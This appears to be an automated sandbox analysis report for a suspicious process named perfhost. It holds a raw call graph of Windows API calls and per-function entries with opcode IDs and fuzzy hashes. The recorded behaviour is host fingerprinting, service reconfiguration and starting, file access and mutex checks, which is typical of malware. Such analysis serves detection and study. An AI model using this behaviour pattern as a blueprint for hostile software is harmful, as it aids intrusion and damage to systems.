7a32fa 21 API calls 7249->7252 7254 7a4575 7249->7254 7251 7a2b42 7250->7251 7251->7221 7252->7254 7253 7a45be MultiByteToWideChar 7255 7a45d7 7253->7255 7267 7a462a 7253->7267 7254->7253 7254->7267 7272 7a2317 7255->7272 7257 7a361c __freea 20 API calls 7257->7248 7259 7a4639 7261 7a465a 7259->7261 7262 7a32fa 21 API calls 7259->7262 7260 7a4601 7264 7a2317 11 API calls 7260->7264 7260->7267 7263 7a46cf 7261->7263 7265 7a2317 11 API calls 7261->7265 7262->7261 7266 7a361c __freea 20 API calls 7263->7266 7264->7267 7268 7a46ae 7265->7268 7266->7267 7267->7257 7268->7263 7269 7a46bd WideCharToMultiByte 7268->7269 7269->7263 7270 7a46fd 7269->7270 7271 7a361c __freea 20 API calls 7270->7271 7271->7267 7273 7a20ef __dosmaperr 5 API calls 7272->7273 7274 7a233e 7273->7274 7277 7a2347 7274->7277 7280 7a239f 7274->7280 7278 7a4c0d __startOneArgErrorHandling 5 API calls 7277->7278 7279 7a2399 7278->7279 7279->7259 7279->7260 7279->7267 7281 7a20ef __dosmaperr 5 API calls 7280->7281 7282 7a23c6 7281->7282 7283 7a4c0d __startOneArgErrorHandling 5 API calls 7282->7283 7284 7a2387 LCMapStringW 7283->7284 7284->7277 7286 7a284d _abort 7285->7286 7293 7a2813 RtlEnterCriticalSection 7286->7293 7288 7a2857 7294 7a28ac 7288->7294 7292 7a2870 _abort 7292->7211 7293->7288 7306 7a2fcc 7294->7306 7296 7a28fa 7297 7a2fcc 26 API calls 7296->7297 7298 7a2916 7297->7298 7299 7a2fcc 26 API calls 7298->7299 7300 7a2934 7299->7300 7301 7a2864 7300->7301 7302 7a2096 _free 20 API calls 7300->7302 7303 7a2878 7301->7303 7302->7301 7320 7a282a RtlLeaveCriticalSection 7303->7320 7305 7a2882 7305->7292 7307 7a2fdd 7306->7307 7311 7a2fd9 7306->7311 7308 7a2fe4 7307->7308 7312 7a2ff7 _abort 7307->7312 7309 7a15d3 __dosmaperr 20 API calls 7308->7309 7310 7a2fe9 7309->7310 7313 7a1517 _abort 26 API calls 7310->7313 7311->7296 7312->7311 7314 7a302e 7312->7314 7315 7a3025 7312->7315 7313->7311 7314->7311 7318 7a15d3 __dosmaperr 20 API calls 7314->7318 7316 7a15d3 __dosmaperr 20 API calls 7315->7316 7317 7a302a 7316->7317 7319 7a1517 _abort 26 API calls 7317->7319 7318->7317 7319->7311 7320->7305 7605 765b56 7606 765b1d 7605->7606 7607 765a9f 7605->7607 7606->7607 7608 765d20 2 API calls 7606->7608 7607->7607 7609 765b3c 7608->7609 7746 764f92 7747 765d20 2 API calls 7746->7747 7748 764f99 7747->7748 7339 764b70 GetUserDefaultUILanguage 7340 764b82 7339->7340 7610 761130 GetPEB 7611 787df0 7613 787d20 7611->7613 7612 787e06 GetComputerNameW 7617 787d37 7612->7617 7613->7611 7613->7612 7614 787d6c GetVolumeInformationW 7613->7614 7615 787d30 7613->7615 7616 787d83 GetWindowsDirectoryW 7613->7616 7613->7617 7615->7614 7615->7617 7616->7615 7616->7617 7678 78cbd0 7693 78be50 _wcslen 7678->7693 7679 78c168 7701 78a9a0 7679->7701 7681 765d20 2 API calls 7681->7693 7682 78c78e CloseServiceHandle 7682->7693 7683 78bffd StrStrIW 7683->7693 7684 78c706 StrStrIW 7684->7693 7686 78bf68 StrStrIW 7686->7693 7687 78c72b StrStrIW 7687->7693 7688 78c399 StrStrIW 7692 78c3a9 7688->7692 7688->7693 7690 78c0fd CloseServiceHandle 7690->7693 7691 78c7e4 StartServiceW 7691->7693 7693->7678 7693->7679 7693->7681 7693->7682 7693->7683 7693->7684 7693->7686 7693->7687 7693->7688 7693->7690 7693->7691 7694 78c36b OpenServiceW 7693->7694 7695 78c65a ChangeServiceConfigW 7693->7695 7696 78bfe9 7693->7696 7697 78a350 7693->7697 7705 76ce90 7693->7705 7694->7693 7695->7693 7695->7696 7698 78a356 7697->7698 7699 78a707 CloseServiceHandle 7698->7699 7700 78a389 7698->7700 7699->7700 7700->7693 7702 78a905 7701->7702 7704 78a907 7701->7704 7702->7696 7702->7701 7703 78a92e LocalFree 7702->7703 7702->7704 7703->7702 7704->7696 7714 76cc9b _wcslen 7705->7714 7706 76d5c5 CreateFileW 7706->7714 7707 76d729 GetFileSizeEx 7709 76d8a1 CloseHandle 7707->7709 7707->7714 7708 765d20 VirtualAlloc VirtualFree 7708->7714 7709->7714 7710 76d42a CloseHandle 7710->7714 7711 76cd5c lstrcmpiW 7711->7714 7713 76cca0 lstrcmpiW 7713->7714 7714->7693 7714->7705 7714->7706 7714->7707 7714->7708 7714->7709 7714->7710 7714->7711 7714->7713 7716 76d049 SetFilePointerEx 7714->7716 7717 76d378 CloseHandle 7714->7717 7719 76cfbb GetFileTime 7714->7719 7720 76cc92 7714->7720 7721 76d903 7714->7721 7722 7689a0 7714->7722 7727 768470 7714->7727 7716->7714 7717->7714 7718 79fdfc 40 API calls 7718->7721 7719->7714 7720->7693 7721->7718 7721->7720 7724 7689a4 7722->7724 7723 765d20 2 API calls 7723->7724 7724->7722 7724->7723 7726 768937 7724->7726 7735 7684c0 7724->7735 7726->7714 7728 765d20 2 API calls 7727->7728 7732 768481 7728->7732 7729 768487 7730 7684c0 2 API calls 7729->7730 7734 768497 7730->7734 7731 771d60 2 API calls 7731->7732 7732->7727 7732->7729 7732->7731 7733 765d20 VirtualAlloc VirtualFree 7732->7733 7732->7734 7733->7732 7734->7714 7741 768470 7735->7741 7736 768487 7737 7684c0 2 API calls 7736->7737 7740 768497 7737->7740 7739 765d20 VirtualAlloc VirtualFree 7739->7741 7740->7724 7741->7735 7741->7736 7741->7739 7741->7740 7742 771d60 7741->7742 7744 771d62 7742->7744 7745 771d76 7742->7745 7743 765d20 2 API calls 7743->7744 7744->7741 7744->7743 7744->7745 7745->7741 7151 7a0070 7152 7a007c 7151->7152 7155 79ffe2 7152->7155 7156 79fff9 7155->7156 7157 7a15d3 __dosmaperr 20 API calls 7156->7157 7160 7a0047 7156->7160 7158 7a003d 7157->7158 7159 7a1517 _abort 26 API calls 7158->7159 7159->7160 7341 7a7977 7342 7a7999 7341->7342 7343 7a7984 7341->7343 7348 7a7994 7342->7348 7357 7a7671 7342->7357 7344 7a15d3 __dosmaperr 20 API calls 7343->7344 7346 7a7989 7344->7346 7347 7a1517 _abort 26 API calls 7346->7347 7347->7348 7353 7a79bb 7374 7a8664 7353->7374 7356 7a2096 _free 20 API calls 7356->7348 7358 7a7689 7357->7358 7362 7a7685 7357->7362 7359 7a7951 26 API calls 7358->7359 7358->7362 7360 7a76a9 7359->7360 7389 7a812c 7360->7389 7363 7a77ff 7362->7363 7364 7a7815 7363->7364 7366 7a7826 7363->7366 7365 7a2096 _free 20 API calls 7364->7365 7364->7366 7365->7366 7367 7a7951 7366->7367 7368 7a795d 7367->7368 7369 7a7972 7367->7369 7370 7a15d3 __dosmaperr 20 API calls 7368->7370 7369->7353 7371 7a7962 7370->7371 7372 7a1517 _abort 26 API calls 7371->7372 7373 7a796d 7372->7373 7373->7353 7375 7a8673 7374->7375 7377 7a8688 7374->7377 7376 7a15c0 __dosmaperr 20 API calls 7375->7376 7379 7a8678 7376->7379 7378 7a86c3 7377->7378 7382 7a86af 7377->7382 7380 7a15c0 __dosmaperr 20 API calls 7378->7380 7381 7a15d3 __dosmaperr 20 API calls 7379->7381 7383 7a86c8 7380->7383 7386 7a79c1 7381->7386 7562 7a863c 7382->7562 7385 7a15d3 __dosmaperr 20 API calls 7383->7385 7387 7a86d0 7385->7387 7386->7348 7386->7356 7388 7a1517 _abort 26 API calls 7387->7388 7388->7386 7390 7a8138 _abort 7389->7390 7391 7a8158 7390->7391 7392 7a8140 7390->7392 7394 7a81f6 7391->7394 7398 7a818d 7391->7398 7414 7a15c0 7392->7414 7396 7a15c0 __dosmaperr 20 API calls 7394->7396 7399 7a81fb 7396->7399 7397 7a15d3 __dosmaperr 20 API calls 7400 7a814d _abort 7397->7400 7417 7a8423 RtlEnterCriticalSection 7398->7417 7402 7a15d3 __dosmaperr 20 API calls 7399->7402 7400->7362 7404 7a8203 7402->7404 7403 7a8193 7405 7a81af 7403->7405 7406 7a81c4 7403->7406 7407 7a1517 _abort 26 API calls 7404->7407 7409 7a15d3 __dosmaperr 20 API calls 7405->7409 7418 7a8217 7406->7418 7407->7400 7410 7a81b4 7409->7410 7411 7a15c0 __dosmaperr 20 API calls 7410->7411 7412 7a81bf 7411->7412 7469 7a81ee 7412->7469 7415 7a18df __dosmaperr 20 API calls 7414->7415 7416 7a15c5 7415->7416 7416->7397 7417->7403 7419 7a8245 7418->7419 7456 7a823e 7418->7456 7420 7a8268 7419->7420 7421 7a8249 7419->7421 7425 7a82b9 7420->7425 7426 7a829c 7420->7426 7422 7a15c0 __dosmaperr 20 API calls 7421->7422 7424 7a824e 7422->7424 7423 7a4c0d __startOneArgErrorHandling 5 API calls 7427 7a841f 7423->7427 7428 7a15d3 __dosmaperr 20 API calls 7424->7428 7429 7a82cf 7425->7429 7472 7a8838 7425->7472 7430 7a15c0 __dosmaperr 20 API calls 7426->7430 7427->7412 7431 7a8255 7428->7431 7475 7a7dbc 7429->7475 7434 7a82a1 7430->7434 7436 7a1517 _abort 26 API calls 7431->7436 7435 7a15d3 __dosmaperr 20 API calls 7434->7435 7438 7a82a9 7435->7438 7436->7456 7441 7a1517 _abort 26 API calls 7438->7441 7439 7a82dd 7444 7a8303 7439->7444 7445 7a82e1 7439->7445 7440 7a8316 7442 7a832a 7440->7442 7443 7a8370 WriteFile 7440->7443 7441->7456 7448 7a8332 7442->7448 7449 7a8360 7442->7449 7446 7a8393 GetLastError 7443->7446 7452 7a82f9 7443->7452 7487 7a7b9c GetConsoleCP 7444->7487 7450 7a83d7 7445->7450 7482 7a7d4f 7445->7482 7446->7452 7453 7a8350 7448->7453 7454 7a8337 7448->7454 7513 7a7e32 7449->7513 7450->7456 7457 7a15d3 __dosmaperr 20 API calls 7450->7457 7452->7450 7452->7456 7460 7a83b3 7452->7460 7505 7a7fff 7453->7505 7454->7450 7498 7a7f11 7454->7498 7456->7423 7459 7a83fc 7457->7459 7462 7a15c0 __dosmaperr 20 API calls 7459->7462 7463 7a83ba 7460->7463 7464 7a83ce 7460->7464 7462->7456 7465 7a15d3 __dosmaperr 20 API calls 7463->7465 7520 7a159d 7464->7520 7467 7a83bf 7465->7467 7468 7a15c0 __dosmaperr 20 API calls 7467->7468 7468->7456 7561 7a8446 RtlLeaveCriticalSection 7469->7561 7471 7a81f4 7471->7400 7525 7a87ba 7472->7525 7547 7a8564 7475->7547 7477 7a7dd1 7477->7439 7477->7440 7478 7a7dcc 7478->7477 7479 7a185b _abort 38 API calls 7478->7479 7480 7a7df4 7479->7480 7480->7477 7481 7a7e12 GetConsoleMode 7480->7481 7481->7477 7485 7a7da9 7482->7485 7486 7a7d74 7482->7486 7483 7a7dab GetLastError 7483->7485 7484 7a8853 WriteConsoleW CreateFileW 7484->7486 7485->7452 7486->7483 7486->7484 7486->7485 7489 7a7bff 7487->7489 7497 7a7d11 7487->7497 7488 7a4c0d __startOneArgErrorHandling 5 API calls 7490 7a7d4b 7488->7490 7492 7a7c85 WideCharToMultiByte 7489->7492 7494 7a7937 40 API calls __fassign 7489->7494 7496 7a7cdc WriteFile 7489->7496 7489->7497 7556 7a304d 7489->7556 7490->7452 7493 7a7cab WriteFile 7492->7493 7492->7497 7493->7489 7495 7a7d34 GetLastError 7493->7495 7494->7489 7495->7497 7496->7489 7496->7495 7497->7488 7503 7a7f20 7498->7503 7499 7a7fe2 7500 7a4c0d __startOneArgErrorHandling 5 API calls 7499->7500 7504 7a7ffb 7500->7504 7501 7a7f9e WriteFile 7502 7a7fe4 GetLastError 7501->7502 7501->7503 7502->7499 7503->7499 7503->7501 7504->7452 7508 7a800e 7505->7508 7506 7a8119 7507 7a4c0d __startOneArgErrorHandling 5 API calls 7506->7507 7509 7a8128 7507->7509 7508->7506 7510 7a8090 WideCharToMultiByte 7508->7510 7512 7a80c5 WriteFile 7508->7512 7509->7452 7511 7a8111 GetLastError 7510->7511 7510->7512 7511->7506 7512->7508 7512->7511 7518 7a7e41 7513->7518 7514 7a7ef4 7515 7a4c0d __startOneArgErrorHandling 5 API calls 7514->7515 7519 7a7f0d 7515->7519 7516 7a7eb3 WriteFile 7517 7a7ef6 GetLastError 7516->7517 7516->7518 7517->7514 7518->7514 7518->7516 7519->7452 7521 7a15c0 __dosmaperr 20 API calls 7520->7521 7522 7a15a8 __dosmaperr 7521->7522 7523 7a15d3 __dosmaperr 20 API calls 7522->7523 7524 7a15bb 7523->7524 7524->7456 7534 7a84fa 7525->7534 7527 7a87cc 7528 7a87d4 7527->7528 7529 7a87e5 SetFilePointerEx 7527->7529 7530 7a15d3 __dosmaperr 20 API calls 7528->7530 7531 7a87d9 7529->7531 7532 7a87fd GetLastError 7529->7532 7530->7531 7531->7429 7533 7a159d __dosmaperr 20 API calls 7532->7533 7533->7531 7535 7a8507 7534->7535 7537 7a851c 7534->7537 7536 7a15c0 __dosmaperr 20 API calls 7535->7536 7538 7a850c 7536->7538 7539 7a15c0 __dosmaperr 20 API calls 7537->7539 7542 7a8541 7537->7542 7541 7a15d3 __dosmaperr 20 API calls 7538->7541 7540 7a854c 7539->7540 7543 7a15d3 __dosmaperr 20 API calls 7540->7543 7544 7a8514 7541->7544 7542->7527 7545 7a8554 7543->7545 7544->7527 7546 7a1517 _abort 26 API calls 7545->7546 7546->7544 7548 7a857e 7547->7548 7549 7a8571 7547->7549 7551 7a15d3 __dosmaperr 20 API calls 7548->7551 7552 7a858a 7548->7552 7550 7a15d3 __dosmaperr 20 API calls 7549->7550 7554 7a8576 7550->7554 7553 7a85ab 7551->7553 7552->7478 7555 7a1517 _abort 26 API calls 7553->7555 7554->7478 7555->7554 7557 7a185b _abort 38 API calls 7556->7557 7558 7a3058 7557->7558 7559 7a1964 __fassign 38 API calls 7558->7559 7560 7a3068 7559->7560 7560->7489 7561->7471 7565 7a85ba 7562->7565 7564 7a8660 7564->7386 7566 7a85c6 _abort 7565->7566 7576 7a8423 RtlEnterCriticalSection 7566->7576 7568 7a85d4 7569 7a85fb 7568->7569 7570 7a8606 7568->7570 7577 7a86e3 7569->7577 7572 7a15d3 __dosmaperr 20 API calls 7570->7572 7573 7a8601 7572->7573 7592 7a8630 7573->7592 7575 7a8623 _abort 7575->7564 7576->7568 7578 7a84fa 26 API calls 7577->7578 7580 7a86f3 7578->7580 7579 7a86f9 7595 7a8469 7579->7595 7580->7579 7582 7a84fa 26 API calls 7580->7582 7591 7a872b 7580->7591 7584 7a8722 7582->7584 7583 7a84fa 26 API calls 7585 7a8737 CloseHandle 7583->7585 7588 7a84fa 26 API calls 7584->7588 7585->7579 7589 7a8743 GetLastError 7585->7589 7586 7a8773 7586->7573 7588->7591 7589->7579 7590 7a159d __dosmaperr 20 API calls 7590->7586 7591->7579 7591->7583 7604 7a8446 RtlLeaveCriticalSection 7592->7604 7594 7a863a 7594->7575 7596 7a8478 7595->7596 7597 7a84df 7595->7597 7596->7597 7602 7a84a2 7596->7602 7598 7a15d3 __dosmaperr 20 API calls 7597->7598 7599 7a84e4 7598->7599 7600 7a15c0 __dosmaperr 20 API calls 7599->7600 7601 7a84cf 7600->7601 7601->7586 7601->7590 7602->7601 7603 7a84c9 SetStdHandle 7602->7603 7603->7601 7604->7594 7618 7a0ff7 7619 7a1000 7618->7619 7622 7a1c33 7619->7622 7623 7a1c72 __startOneArgErrorHandling 7622->7623 7628 7a1cf4 __startOneArgErrorHandling 7623->7628 7632 7a3980 7623->7632 7625 7a1d1e 7627 7a1d2a 7625->7627 7639 7a3c94 7625->7639 7630 7a4c0d __startOneArgErrorHandling 5 API calls 7627->7630 7628->7625 7635 7a3655 7628->7635 7631 7a1020 7630->7631 7646 7a39a3 7632->7646 7636 7a367d 7635->7636 7637 7a4c0d __startOneArgErrorHandling 5 API calls 7636->7637 7638 7a369a 7637->7638 7638->7625 7640 7a3ca1 7639->7640 7641 7a3cb6 7639->7641 7642 7a3cbb 7640->7642 7644 7a15d3 __dosmaperr 20 API calls 7640->7644 7643 7a15d3 __dosmaperr 20 API calls 7641->7643 7642->7627 7643->7642 7645 7a3cae 7644->7645 7645->7627 7647 7a39ce __raise_exc 7646->7647 7648 7a3bc7 RaiseException 7647->7648 7649 7a399e 7648->7649 7649->7628 7322 7a22b5 7323 7a20ef __dosmaperr 5 API calls 7322->7323 7324 7a22dc 7323->7324 7325 7a22fa InitializeCriticalSectionAndSpinCount 7324->7325 7326 7a22e5 7324->7326 7325->7326 7327 7a4c0d __startOneArgErrorHandling 5 API calls 7326->7327 7328 7a2311 7327->7328 6629 765085 6630 76506f 6629->6630 6631 765089 6629->6631 6634 788550 6630->6634 6633 765078 6640 788556 6634->6640 6635 788145 GetLastError 6649 787dd7 6635->6649 6636 788209 GetUserNameW 6636->6649 6656 787d37 6636->6656 6637 788bc1 GetLastError 6637->6640 6638 788986 SetEntriesInAclW 6638->6640 6639 7883fb GetUserNameW 6639->6649 6640->6634 6640->6635 6640->6637 6640->6638 6642 7889cd OpenMutexW 6640->6642 6648 788599 6640->6648 6640->6649 6650 787d20 6640->6650 6653 787d30 6640->6653 6654 78896a wsprintfW 6640->6654 6655 788953 AllocateAndInitializeSid 6640->6655 6640->6656 6658 78890b LocalFree 6640->6658 6641 788248 6643 78824a GetLastError 6641->6643 6642->6633 6646 788250 6643->6646 6645 787d6c GetVolumeInformationW 6645->6633 6646->6633 6647 78836e GetLastError 6647->6649 6648->6653 6648->6654 6649->6635 6649->6636 6649->6639 6649->6641 6649->6643 6649->6645 6649->6647 6649->6650 6651 787fd4 GetLastError 6649->6651 6649->6653 6649->6656 6659 787f6b GetVolumeInformationW 6649->6659 6650->6645 6652 787d83 GetWindowsDirectoryW 6650->6652 6650->6653 6650->6656 6657 787e06 GetComputerNameW 6650->6657 6651->6649 6652->6653 6652->6656 6653->6645 6653->6656 6654->6653 6655->6640 6656->6633 6657->6656 6658->6640 6659->6649 7338 7a708e RtlUnwind 6660 765d20 6662 765d22 6660->6662 6661 765d39 VirtualAlloc 6661->6662 6662->6661 6664 765d46 VirtualFree 6662->6664 7329 7658ac 7330 7658b6 7329->7330 7332 7658be 7330->7332 7333 765d20 7330->7333 7335 765d22 7333->7335 7334 765d39 VirtualAlloc 7334->7335 7335->7332 7335->7334 7337 765d46 VirtualFree 7335->7337 7337->7332 7650 7a8de0 7651 7a8df9 __startOneArgErrorHandling 7650->7651 7653 7a8e22 __startOneArgErrorHandling 7651->7653 7654 7a36d2 7651->7654 7655 7a370b __startOneArgErrorHandling 7654->7655 7656 7a39a3 __raise_exc RaiseException 7655->7656 7657 7a3732 __startOneArgErrorHandling 7655->7657 7656->7657 7658 7a3775 7657->7658 7659 7a3750 7657->7659 7660 7a3c94 __startOneArgErrorHandling 20 API calls 7658->7660 7665 7a3cc3 7659->7665 7662 7a3770 __startOneArgErrorHandling 7660->7662 7663 7a4c0d __startOneArgErrorHandling 5 API calls 7662->7663 7664 7a3799 7663->7664 7664->7653 7666 7a3cd2 7665->7666 7667 7a3cf1 __startOneArgErrorHandling 7666->7667 7668 7a3d46 __startOneArgErrorHandling 7666->7668 7670 7a3655 __startOneArgErrorHandling 5 API calls 7667->7670 7669 7a3c94 __startOneArgErrorHandling 20 API calls 7668->7669 7673 7a3d3f 7669->7673 7671 7a3d32 7670->7671 7672 7a3c94 __startOneArgErrorHandling 20 API calls 7671->7672 7671->7673 7672->7673 7673->7662 7674 7a0fe0 7675 7a1000 7674->7675 7676 7a1c33 __startOneArgErrorHandling 21 API calls 7675->7676 7677 7a1020 7676->7677 7161 765648 7164 768250 GetCurrentProcess 7161->7164 7163 76564f 7164->7163

                                        Executed Functions

                                        Function 00788550 Relevance: 20.0, APIs: 13, Instructions: 500COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: ErrorLast
                                        • String ID:
                                        • API String ID: 1452528299-0
                                        • Opcode ID: 8f23611293171af965204233360cd2461fdc816d478a7012b577320d11231a79
                                        • Instruction ID: e2ddd2c0a7f2a80c93fce8235177780d26751921140c88731f72032bc52ecb94
                                        • Opcode Fuzzy Hash: 8f23611293171af965204233360cd2461fdc816d478a7012b577320d11231a79
                                        • Instruction Fuzzy Hash: 70E12A61ACC341AACBFA77284C0D7352B616B62730FEC4689E156D61E2EE6C9C05D337
                                        Function 00787DF0 Relevance: 4.6, APIs: 3, Instructions: 89COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 339 787df0-787dfa 340 788288-78829a call 770d80 339->340 341 787e00 339->341 348 78851e-78852d call 770d80 340->348 349 7882a0 340->349 341->340 342 787e06-787e15 GetComputerNameW 341->342 344 787e1b 342->344 345 7882b6-7882bb 342->345 344->345 347 787e21-787e2d 344->347 349->348 351 7882a6 349->351 354 787dbc-787dce 351->354 355 7882ac 351->355 361 787d6c-787d80 GetVolumeInformationW 354->361 362 787d35 354->362 357 787d20-787d2b 355->357 358 7882b2-7882b4 355->358 359 787d2d-787d94 357->359 360 787d61-787d68 357->360 358->345 359->360 367 787d96 359->367 365 787d6a 360->365 366 787de5-787dea 360->366 362->361 364 787d37-787d39 362->364 368 787d3b-787d46 364->368 365->361 365->366 369 787dec 366->369 370 787d83-787d8c GetWindowsDirectoryW 366->370 372 787d97-787d98 367->372 368->372 373 787d48-787dac 368->373 369->370 374 787dee 369->374 370->368 371 787d8e-787da6 370->371 371->354 379 787da8 371->379 376 787d9a-787d9f 372->376 377 787de2 372->377 373->372 380 787dae-787db3 373->380 374->339 379->354 381 787daa-787dba 379->381 381->354
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: ComputerName
                                        • String ID:
                                        • API String ID: 3545744682-0
                                        • Opcode ID: 77b9d483e1136cae4e59aa627eee538cb5b15670b8fd1f87b51647b499be01a7
                                        • Instruction ID: 3d64e0040f1da20c81796767601268e243b1d6406b2aa11ff29f50002a13ad56
                                        • Opcode Fuzzy Hash: 77b9d483e1136cae4e59aa627eee538cb5b15670b8fd1f87b51647b499be01a7
                                        • Instruction Fuzzy Hash: 9421F4B57CC3407BD63D76148C0ABB53A642FA1B10FB88485E48B551D2E66CEC09C3B7
                                        Function 00765D20 Relevance: 2.5, APIs: 2, Instructions: 38COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 383 765d20 384 765d26-765d2d 383->384 385 765d22 383->385 387 765d36-765d37 384->387 388 765d2f 384->388 385->384 386 765d24 385->386 386->384 390 765d5d 387->390 391 765d39-765d42 VirtualAlloc 387->391 388->387 389 765d30-765d31 388->389 392 765d33-765d35 389->392 394 765d64 390->394 395 765d5f 390->395 391->392 393 765d44 391->393 392->387 393->392 396 765d46-765d50 393->396 398 765d66 394->398 399 765d69-765d73 VirtualFree 394->399 395->394 397 765d61 395->397 400 765d54-765d5b 396->400 401 765d52 396->401 397->394 402 765d63 397->402 398->399 403 765d68 398->403 400->390 400->394 401->400 402->394 403->399
                                        APIs
                                        • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00765D6D
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 626e1bf037e72fe79c5e1ec633df1b7fee2211e443035f99874613aaeb27b446
                                        • Instruction ID: 640acb43539dd74268d849af1cf2ffaa62d2a3b224fcc9296926887465bd92d5
                                        • Opcode Fuzzy Hash: 626e1bf037e72fe79c5e1ec633df1b7fee2211e443035f99874613aaeb27b446
                                        • Instruction Fuzzy Hash: 8AF0E951B04F40BACE3E1364EDDDB752A209B53738F0C4345AEA3290F2875D1C06FA02

                                        Non-executed Functions

                                        Function 0078CBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 417COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: d$w
                                        • API String ID: 0-2400632791
                                        • Opcode ID: 6fcf8d884e933b3770720bd2658b6604f1e9a6d11bec288e7bd7461bcad32a79
                                        • Instruction ID: 621f0861d4e4261e0260c6eedd42a90ef0793cf626747d41d231bc69da7300f6
                                        • Opcode Fuzzy Hash: 6fcf8d884e933b3770720bd2658b6604f1e9a6d11bec288e7bd7461bcad32a79
                                        • Instruction Fuzzy Hash: 04C124A1AC8384AEDE337A248C4DB763B64AB61760F5C4196F649D60F3E37C5C049732
                                        Function 007A1361 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 007A1459
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 007A1463
                                        • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 007A1470
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 1e7c939db45c659f12cf128101255cccf3ae16b2cb0daa408e65b844786aed8b
                                        • Instruction ID: e637d6a1043264dc612aa71ff9f30d96a4cb5581d62438a0d496efd7a84ca8fa
                                        • Opcode Fuzzy Hash: 1e7c939db45c659f12cf128101255cccf3ae16b2cb0daa408e65b844786aed8b
                                        • Instruction Fuzzy Hash: BA31D67490122CEBCB21DF68D888B9DB7B8AF89310F5042DAE41CA7250E7749F858F55
                                        Function 007A3F3D Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000003,?,007A3F13,00000003,007BDE80,0000000C,007A403D,00000003,00000002,00000000,?,007A2038,00000003), ref: 007A3F5E
                                        • TerminateProcess.KERNEL32(00000000,?,007A3F13,00000003,007BDE80,0000000C,007A403D,00000003,00000002,00000000,?,007A2038,00000003), ref: 007A3F65
                                        • ExitProcess.KERNEL32 ref: 007A3F77
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID: Process$CurrentExitTerminate
                                        • String ID:
                                        • API String ID: 1703294689-0
                                        • Opcode ID: 471e86185743e61ab6e5dc04d781bc969d7703552078f2dc5f650de095265f4c
                                        • Instruction ID: 755a9a8e1f371a328a975a46e8387f8448eca3157b9ea724e710170bbb6402f3
                                        • Opcode Fuzzy Hash: 471e86185743e61ab6e5dc04d781bc969d7703552078f2dc5f650de095265f4c
                                        • Instruction Fuzzy Hash: 47E04632414948FFCF016F28DC08A593B3AEBC6341F008514F8058A122DB3DDE42CB86
                                        Function 00761130 Relevance: .0, Instructions: 2COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2952576778.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_760000_perfhost.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                        • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                        • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                        • Instruction Fuzzy Hash:
                                        Function 007A24FF Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
